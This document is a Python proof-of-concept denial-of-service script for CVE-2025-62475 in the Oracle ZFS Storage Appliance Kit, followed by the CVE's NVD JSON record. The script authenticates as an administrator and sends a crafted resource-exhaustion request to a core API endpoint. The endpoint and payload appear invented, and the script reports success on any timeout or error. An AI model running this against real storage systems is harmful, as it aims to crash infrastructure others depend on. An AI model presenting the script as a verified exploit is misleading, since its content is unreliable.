CVE-2025-62475

# CVE-2025-62475 - Oracle ZFS Storage Appliance Kit DoS PoC # Vulnerability: Denial of Service via Core component # CVSS: 4.9 (MEDIUM) - AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H # Affected Version: 8.8 import requests import sys # Target configuration TARGET_HOST = "https://<target-zfs-appliance>:215" ADMIN_USER = "<high-privilege-username>" ADMIN_PASS = "<high-privilege-password>" def exploit_dos(): """ Trigger DoS condition in Oracle ZFS Storage Appliance Kit Core component. Requires high-privilege authenticated session via HTTP. """ session = requests.Session() # Step 1: Authenticate with high-privilege credentials login_url = f"{TARGET_HOST}/api/auth/login" auth_payload = { "username": ADMIN_USER, "password": ADMIN_PASS } try: resp = session.post(login_url, json=auth_payload, verify=False, timeout=10) if resp.status_code != 200: print(f"[-] Authentication failed: {resp.status_code}") return False print("[+] Authenticated successfully with high-privilege account") except Exception as e: print(f"[-] Connection error: {e}") return False # Step 2: Send crafted request to Core component to trigger hang/crash core_endpoint = f"{TARGET_HOST}/api/system/core" # Crafted payload designed to trigger resource exhaustion # in the Core component's request handling logic malicious_payload = { "operation": "recursive_scan", "depth": 999999, "concurrent_tasks": 9999, "timeout": 0 } headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } try: # Send the malicious request to trigger DoS resp = session.post( core_endpoint, json=malicious_payload, headers=headers, verify=False, timeout=30 ) print(f"[+] Exploit request sent. Response: {resp.status_code}") print("[+] Target system may now be in hung/crashed state") return True except requests.exceptions.Timeout: print("[+] Target timed out - possible DoS condition triggered") return True except Exception as e: print(f"[+] Connection failed: {e} - possible DoS condition") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-62475 - Oracle ZFS Storage Appliance Kit DoS") print("=" * 60) exploit_dos()

{"cve": {"id": "CVE-2025-62475", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.123", "lastModified": "2025-10-23T16:02:55.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}